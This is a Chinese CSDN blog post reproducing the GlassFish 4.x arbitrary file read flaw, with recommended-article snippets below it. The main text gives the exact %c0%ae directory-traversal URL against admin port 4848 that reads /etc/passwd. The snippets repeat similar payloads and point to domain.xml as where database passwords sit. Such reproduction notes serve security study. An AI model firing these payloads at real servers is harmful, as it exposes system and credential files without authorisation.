漏洞复现----11、GlassFish任意文件读取

已于 2022-05-30 15:28:54 修改
阅读量3k 收藏 1
点赞数
分类专栏: # 漏洞复现 网络安全技术 文章标签: GlassFish任意文件读取
于 2021-11-10 15:29:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/117740883
版权

文章目录


一、Glassfish简介

GlassFish是一款java编写的跨平台的开源的应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。Glassfish是Oracle 开发的官方Java EE容器,也是同时支持Servlet和EJB,支持最新的特性,有自己的web容器,支持集群,支持热部署。

二、漏洞简介

GlassFish容器解析了java语言中的特殊字符导致漏洞的产生。此漏洞严格来说是Glassfish容器特有的漏洞,和语言无关,在其他容器上并不适用。

java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.。利用%c0%ae来向上跳转,达到目录穿越、任意文件读取的效果。在此环境中,只要目录穿越过程中存在%c0,即可穿越成功。

默认端口:
使用Admin的端口 4848
使用HTTP Instance的端口 8080
使用HTTP_SSL的端口 8181
使用IIOP_SSL的端口 3820

影响版本
GlassFish4全版本(4.0、4.1、4.1.1、4.1.2)

http://ip:4848/theme/META-INF/%c0../%c0../%c0../%c0../%c0../%c0../%c0../%c0../%c0../%c0../etc/passwd

在这里插入图片描述

李沉肩
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
快速检测 GlassFish 任意文件读取漏洞的 Python 脚本
weixin_43263566的博客
05-28 1677
快速检测 GlassFish 任意文件读取漏洞的 Python 脚本
java任意文件读取漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-18 1057
java任意文件读取漏洞除了Java本身的文件读取函数FileInputStream、XXE导致的文件读取,Java的一些模块也支持“file://”协议,这是Java应用中出任意文件读取最多的地方,如Spring Cloud Config Server路径穿越与任意文件读取漏洞(CVE-2019-3799)、Jenkins任意文件读取漏洞(CVE-2018-1999002)等。 Javajava任意文件读取函数 Java本身的文件读取函数FileInputStream、XXE导致的文件读取。 Java的
GlassFish 任意文件读取
good good study
03-04 4284
一. 漏洞描述 glassfish是一款java编写的跨平台的开源的应用服务器。2015年10月,被爆出通用任意文件读取漏洞。利用这个漏洞,攻击者可读取服务器上任意文件。 与宽字节SQL注入一致,都是由于unicode编码歧义导致的。 影响版本:4.0至4.1 二. 漏洞 1. 环境搭建 使用vulhub中的环境搭建 访问8848 2. 构造如下payload: https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c
glassfish任意文件读取漏洞
剁椒鱼头没剁椒的博客
01-27 1208
GlassFish是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。
深入浅出带你学习GlassFish中间件漏洞/深入浅出带你学习GlassFish中间件漏洞-详细白帽子指南
最新发布
2401_84915584的博客
05-20 904
本文正在参加「金石计划 . 瓜分6万金大奖」前文上文给大家带来了常见的漏洞不知道大家理解了没有,今天给大家带来一个新的中间件漏洞的讲解——
记一次GlassFish任意文件读取漏洞
weixin_63021331的博客
06-13 248
GlassFish漏洞总结
glassfish任意文件读取漏洞-漏洞
m0_66376444的博客
04-15 333
GlassFish是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。GlassFish漏洞成因:java语义中会把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符的"."(点)。执行POC进行任意文件读取linux下的/etc/passwd或者windows下的win.ini,成功读取。domains/domain1/config/domain.xml 各种数据库密码位置。三、GlassFish的敏感目录。
glassfish-3.1.2.2.zip
05-16
压缩包中的“glassfish3”文件夹包含了Glassfish 3.1.2.2的全部组件和配置文件。安装时,用户通常会解压此文件,然后按照官方文档的指引进行配置和启动服务器。在实际应用中,开发者可以将编译好的Java EE 6应用打包...
docker-glassfish:适用于Oracle GlassFish 3.1.2.2的Dockerfile
04-29
GlassFish 3 GlassFish是一个开放源代码的应用程序服务器项目,由Sun Microsystems针对Java EE平台启动,在由Oracle Corporation赞助。 支持的版本称为Oracle GlassFish Server。 GlassFish是免费软件,具有两个...
glassfish任意文件读取漏洞.py
04-19
glassfish任意文件读取漏洞批量检测脚本,如果有使用问题可以加qq:2369779427
Message-Driven Bean EJB实例源代码
08-27
JMS是Java平台的标准API,用于在分布式环境中创建、发送、接收和读取消息。它定义了两种消息模型:点对点(Point-to-Point,P2P)和发布/订阅(Publish/Subscribe, Pub/Sub)。在MDB中,通常使用P2P模型的队列或Pub...
JavaEE开发工具-经典稳定版-霓虹灯
05-26
9. **XML编辑器**:支持XML文件的编辑和验证,对于处理JavaEE相关的配置文件非常有用。 Eclipse Neon.2还引入了一些新的特性和改进,例如改进了性能、增强了用户体验和稳定性,同时对Java 8的支持更加完善。通过...
漏洞 Oracle GlassFish Server 任意文件读取漏洞(CVE-2017-1000028)
nnn2188185的博客
04-16 1052
Oracle GlassFish Server Open Source Edition 4.1版本中存在任意文件读取漏洞。攻击者可借助特制的HTTP GET请求利用该漏洞访问敏感数据。 CVE-2017-1000028 CNNVD-201707-831 CNVD-2017-27302
目录穿越及文件包含漏洞
weixin_45007073的博客
01-31 7518
目录穿越概念 目录穿越(Directory Traversal)攻击是黑客能够在Web应用程序所在的根目录以外的文件夹上,任意地存取被限制的文件夹、执行命令或查找数据。目录穿越攻击,也有人称为Path Traversal攻击。 目录穿越的漏洞危害 攻击者可以使用目录穿越攻击来查找、执行或存取Web应用程序所在的根目录以外的文件夹。如果目录穿越攻击成功,黑客就可以执行破坏性的命令来攻击网站 文件操作漏洞的分类 代码展示 先来简单展示一下目录穿越的原理,先在当前目录下新建一个file文件夹,里面建一个1.tx
glassfish任意文件读取漏洞(4.0/4.1)
3569
03-28 1872
相关厂商:glassfish漏洞编号:wooyun-2010-0144595漏洞详情:http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0...
利用glassfish4任意文件读取拿权限的一些思路
weixin_30628077的博客
01-16 260
只要讨论的是linux环境测试发只针对GlassFish4,且基本上是已root运行的http://www.wooyun.org/bugs/wooyun-2010-0144595 zoomeye dorkGlassFish Server Open Source Edition 4.1放张图 nosec的dorkbody="Copyright © 2005, 2013, Oracle an...
GlassFish 任意文件读取漏洞
锋刃科技的博客
06-13 1925
1、简介 glassfish是一款java编写的跨平台的开源的应用服务器。 2、漏洞分析 与宽字节SQL注入一致,都是由于unicode编码歧义导致的。具体payload如下构造: https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c
ElasticSearch 目录穿越漏洞(CVE-2015-3337)
黑白的博客
12-13 2206
声明 好好学习,天天向上 漏洞描述 在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。 影响范围 1.4.5以下/1.5.2以下 过程 这里使用v1.4.4版本 使用vulhub cd /app/vulhub-master/elasticsearch/CVE-2015-3337 使用docker启动 docker-compose up -d 环境启动后,访问http://your-ip:920
GlassFish任意文件读取漏洞跟踪
weixin_34067049的博客
09-04 530
漏洞描述】 本文讲的是GlassFish任意文件读取漏洞跟踪,GlassFish 是一款用于构建 Java EE的应用服务组件。2015年10月,被爆出通用任意文件读取漏洞。利用这个漏洞,攻击者可读取服务器上任意文件。用户可自行到GlassFish官方网站下载更新修。 【趋势跟踪】 根据我们在全球部署的蜜罐捕获的数据显示,针对GlassFish的攻击...
glassfish login-module-config
06-09
`login-module-config` 是GlassFish服务器中用于配置认证机制的元素之一。它通常与 `security-service` 元素一起使用,用于指定一组认证模块,以实用户身份验证和授权。 一个 `login-module-config` 元素通常包含以下子元素: - `login-module-class`:指定认证模块的Java类名。 - `module-options`:指定认证模块的配置参数。它们作为键值对的形式传递给认证模块的初始化方法。例如,可以使用 `module-option` 元素来指定用户名和密码的键名和键值。 - `flag`:指定认证模块的运行方式。例如,可以使用 `required` 标志来指定认证模块是必需的,或者使用 `requisite` 标志来指定认证模块是可选的但必须成功。 一个 `security-service` 元素可以包含多个 `login-module-config` 元素,这些元素可以按照指定的顺序运行,直到有一个模块成功验证用户身份或者所有模块都失败为止。这样可以提高系统的安全性和可靠性。 以下是一个 `security-service` 元素的示例配置,其中包含两个 `login-module-config` 元素: ``` <security-service> <realm> <authentication> <login-module-config> <login-module-class>com.sun.enterprise.security.auth.login.LdapLoginModule</login-module-class> <module-options> <option name="java.naming.provider.url" value="ldap://ldap.example.com:389"/> <option name="java.naming.security.principal" value="cn=admin,dc=example,dc=com"/> <option name="java.naming.security.credentials" value="password"/> <option name="user-search-base" value="ou=people,dc=example,dc=com"/> <option name="user-search-filter" value="(uid={username})"/> </module-options> </login-module-config> <login-module-config> <login-module-class>com.sun.enterprise.security.auth.login.FileLoginModule</login-module-class> <module-options> <option name="file" value="${com.sun.aas.instanceRoot}/config/admin-keyfile"/> <option name="debug" value="true"/> </module-options> </login-module-config> </authentication> </realm> </security-service> ``` 在这个配置中,第一个 `login-module-config` 元素指定了 LDAP 认证模块,第二个 `login-module-config` 元素指定了文件认证模块。这两个认证模块按照指定的顺序运行,直到有一个模块成功验证用户身份或者所有模块都失败为止。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值